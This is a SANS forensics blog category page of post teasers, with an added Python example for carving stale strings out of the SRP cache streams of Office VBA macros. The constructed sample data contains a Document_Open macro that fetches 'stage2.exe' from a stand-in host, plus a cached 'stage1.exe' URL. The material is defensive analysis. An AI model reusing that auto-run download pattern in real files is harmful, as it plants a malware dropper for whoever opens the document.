SANS Digital Forensics and Incident Response Blog: Category - Computer Forensics

DFIRCON EAST Smartphone Forensics Challenge

DFIRCON EAST Smartphone Forensics Challenge: https://www.surveymonkey.com/s/Smartphone-Challenge The smartphone dataset contains malware and an iOS backup file. The goal is to highlight application data often missed by forensic tools. Your job? Find it. The object of our challenge is simple: Download the smartphone dataset and attempt to answer the 6 questions. To successfully submit for the … Continue reading DFIRCON EAST Smartphone Forensics Challenge


Hibernation Slack: Unallocated Data from the Deep Past

Hi Folks, I was recently doing some forensic research on a laptop which had been formatted and factory-reinstalled (using the preinstalled HPA partition it shipped with), and then used normally by another user for six months prior to collection. I wasn't really expecting to be able to recover much of anything from before the format, … Continue reading Hibernation Slack: Unallocated Data from the Deep Past


Getting the most out of Smartphone Forensic Exams - SANS Advanced Smartphone Forensics Poster Release

One thing is certain in the DFIR field: there are far more facts, details and artifacts to remember than any forensic examiner can easily retain. SANS has produced an incredibly helpful array … Continue reading Getting the most out of Smartphone Forensic Exams - SANS Advanced Smartphone Forensics Poster Release


SRP Streams in MS Office Documents Reveal Earlier Versions of Malicious Macros

SRP streams (the __SRP_0, __SRP_1, ... streams inside a Microsoft Office document's VBA project storage) are a performance cache, and they can reveal older versions of the VBA macro code an adversary used in earlier attacks. When the attacker modifies a malicious document for a new attack, Office sometimes leaves a cached copy of the earlier macro in these streams, so analysts can expand their understanding of the incident and derive valuable threat intelligence. Tools that only decompress the current module source will not show this cache; the raw streams have to be dumped and inspected. In other words, SRP streams can help investigators travel back in time. Continue reading SRP Streams in MS Office Documents Reveal Earlier Versions of Malicious Macros
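An added example of the triage step this describes, not code from the original post: pull the __SRP_n streams out of the VBA storage, carve printable strings from them (SRP caches hold VBA string literals as UTF-16LE, which a single-byte strings pass misses), and keep only the strings that do not occur in the current macro source. Whatever survives is a candidate remnant of an earlier revision. The stream names, the sample cache bytes and the sample macro source below are constructed for illustration; reading a real document is delegated to the third-party olefile module, assumed installed.

```python
import re
from typing import Dict, List

# Minimum printable run to report; shorter runs in compiled p-code tables are mostly noise.
MIN_LEN = 6


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Return printable ASCII and UTF-16LE runs found in a binary blob."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(blob)]
    return found


def srp_streams(streams: Dict[str, bytes]) -> Dict[str, bytes]:
    """Pick the __SRP_n streams out of a {stream path: bytes} map of OLE streams."""
    return {
        path: data
        for path, data in streams.items()
        if path.rsplit("/", 1)[-1].upper().startswith("__SRP_")
    }


def cache_only_strings(streams: Dict[str, bytes], current_source: str,
                       min_len: int = MIN_LEN) -> Dict[str, List[str]]:
    """Strings present in an SRP cache stream but absent from the current macro text.

    Anything that survives this filter (URLs, file names, decoy text, renamed
    identifiers) is a candidate artefact of an earlier revision of the macro.
    """
    leftovers = {}
    for path, data in srp_streams(streams).items():
        stale = sorted({s for s in extract_strings(data, min_len) if s not in current_source})
        if stale:
            leftovers[path] = stale
    return leftovers


def load_streams(path: str) -> Dict[str, bytes]:
    """Read every stream of a real OLE2 document with olefile (third-party, assumed installed)."""
    import olefile  # only needed for real files, not for the constructed sample below

    ole = olefile.OleFileIO(path)
    try:
        return {
            "/".join(entry): ole.openstream(entry).read()
            for entry in ole.listdir(streams=True, storages=False)
        }
    finally:
        ole.close()


# Constructed sample data (not from any real case): an SRP cache that still carries
# a download URL from an earlier revision, next to the module source the document
# currently contains. Real streams would be fetched with load_streams("sample.doc").
SAMPLE_STREAMS = {
    "Macros/VBA/__SRP_0": (
        b"\x00\x01\x02\x03"
        + "http://old-host.example/stage1.exe".encode("utf-16-le")
        + b"\x00\x00\x05\x06"
        + b"Document_Open"
        + b"\x00\x00"
    ),
    "Macros/VBA/ThisDocument": b"<compressed module source, not inspected here>",
}

CURRENT_SOURCE = (
    "Private Sub Document_Open()\n"
    '    Call Fetch("http://new-host.example/stage2.exe")\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for stream, strings in cache_only_strings(SAMPLE_STREAMS, CURRENT_SOURCE).items():
        print(stream)
        for s in strings:
            print("   ", s)
```

On the sample, "Document_Open" is dropped because it is still in the current source, while the old stage1 URL is reported from __SRP_0 as a cache-only string. The substring test is deliberately loose: a string that merely moved or was re-quoted is not interesting, whereas one that no longer appears anywhere in the module is worth a closer look.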


Managing and Exploring Malware Samples with Viper

Keeping track of all the samples on your plate can become cumbersome and, at times, next to impossible; that's where projects like Viper come in. Viper is "a framework to store, classify and investigate binary files." The following article, contributed by David Westcott, explains how to get started with this tool. Continue reading Managing and Exploring Malware Samples with Viper